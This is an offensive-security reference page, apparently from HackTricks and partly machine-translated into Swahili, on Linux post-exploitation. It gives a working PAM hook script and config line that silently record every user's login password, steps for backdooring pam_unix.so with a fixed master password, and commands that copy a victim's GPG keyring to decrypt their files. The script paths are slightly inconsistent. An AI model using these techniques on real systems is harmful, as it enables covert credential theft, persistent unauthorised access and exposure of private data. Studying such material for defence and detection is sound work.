HackTricksLinux Post-Exploitation
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Sniffing Logon Passwords with PAM
Wacha tuchague moduli ya PAM ili kurekodi kila password ambayo kila mtumiaji anaitumia kuingia. Ikiwa hujui PAM ni nini angalia:
PAM - Pluggable Authentication Modules
For further details check the original post. Hii ni muhtasari tu:
Technique Overview: Pluggable Authentication Modules (PAM) zinatoa unyumbufu katika kusimamia uthibitishaji kwenye mifumo ya Unix. Zinaboresha security kwa kuruhusu ubinafsishaji wa michakato ya login lakini pia zinaweza kuleta hatari endapo zitatumiwa vibaya. Muhtasari huu unaelezea technique ya kukamata login credentials kwa kutumia PAM, pamoja na mitigation strategies.
Capturing Credentials:
- Script ya bash yenye jina
toomanysecrets.shimeandikwa ili kurekodi jaribio za login, ikichukua tarehe, jina la mtumiaji ($PAM_USER), password (kupitia stdin), na IP ya host ya mbali ($PAM_RHOST) katika/var/log/toomanysecrets.log. - Script imefanywa executable na kuingizwa katika configuration ya PAM (
common-auth) kwa kutumia modulepam_exec.sona chaguzi za kuendesha kimya na kufikisha authentication token kwa script. - Mbinu hii inaonyesha jinsi host ya Linux iliyovamiwa inaweza kutumika kurekodi credentials kwa utulivu.
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
Backdooring PAM
Kwa maelezo zaidi angalia original post. Hii ni muhtasari tu:
Pluggable Authentication Module (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa watumiaji. Inaendeshwa kwa misingi mitatu kuu: username, password, na service. Faili za usanidi kwa kila service ziko kwenye saraka /etc/pam.d/, ambapo maktaba za pamoja hushughulikia uthibitishaji.
Lengo: Badilisha PAM ili kuruhusu uthibitishaji kwa kutumia password maalum, ukiepuka password halisi ya mtumiaji. Hii inazingatia hasa maktaba ya pamoja pam_unix.so inayotumika na faili common-auth, ambayo imejumuishwa na karibu services zote kwa password verification.
Steps for Modifying pam_unix.so:
- Locate the Authentication Directive in the
common-authfile:
- Mstari unaowajibika kwa kuangalia password ya mtumiaji unaitisha
pam_unix.so.
- Modify Source Code:
- Ongeza tamko la upendeleo (conditional) kwenye faili la chanzo
pam_unix_auth.cambalo linampa ufikiaji ikiwa password iliyowekwa mapema imetumika, vinginevyo linaendelea na mchakato wa kawaida wa authentication.
- Recompile and Replace the modified
pam_unix.solibrary in the appropriate directory.
- Recompile na ubadilishe maktaba
pam_unix.soiliyorekebishwa kwenye saraka husika.
- Testing:
- Ufikiaji unatolewa kwa services mbalimbali (login, ssh, sudo, su, screensaver) kwa kutumia password iliyotangazwa kabla, wakati michakato ya kawaida ya authentication haidhuriwa.
tip
Unaweza kuendesha mchakato huu kwa kiotomatiki kwa kutumia https://github.com/zephrax/linux-pam-backdoor
Decrypting GPG loot via homedir relocation
If you find an encrypted .gpg file and a user’s ~/.gnupg folder (pubring, private-keys, trustdb) but you can’t decrypt due to GnuPG homedir permissions/locks, copy the keyring to a writable location and use it as your GPG home.
Makosa ya kawaida utakayoyaona bila hili: "unsafe ownership on homedir", "failed to create temporary file", or "decryption failed: No secret key" (kwa sababu GPG haiwezi kusoma/kuandika homedir ya asili).
Workflow:
# 1) Stage a writable homedir and copy the victim's keyring
mkdir -p /dev/shm/fakehome/.gnupg
cp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/
# 2) Ensure ownership & perms are sane for gnupg
chown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg
chmod 700 /dev/shm/fakehome/.gnupg
# 3) Decrypt using the relocated homedir (either flag works)
GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
# or
gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg
Ikiwa nyenzo za ufunguo wa siri zipo katika private-keys-v1.d, GPG itafungua na ku-decrypt bila kuuliza passphrase (au itauliza ikiwa ufunguo umewekwa ulinzi).
Marejeo
- 0xdf – HTB Environment (GPG homedir relocation to decrypt loot)
- GnuPG Manual – Home directory and GNUPGHOME
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.